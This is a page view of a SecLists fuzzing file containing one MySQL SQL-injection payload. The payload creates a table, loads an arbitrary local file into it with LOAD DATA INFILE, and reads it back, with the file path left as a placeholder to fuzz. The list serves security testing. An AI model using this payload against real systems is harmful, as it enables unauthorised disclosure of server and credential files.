SecLists/Fuzzing/MySQL-Read-Local-Files.fuzzdb.txt

4 lines
210 B
Plaintext
Raw Normal View History

2012-08-26 20:04:09 -07:00
# mysql local file disclosure through sqli
# fuzz interesting absolute filepath/filename into <filepath>
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;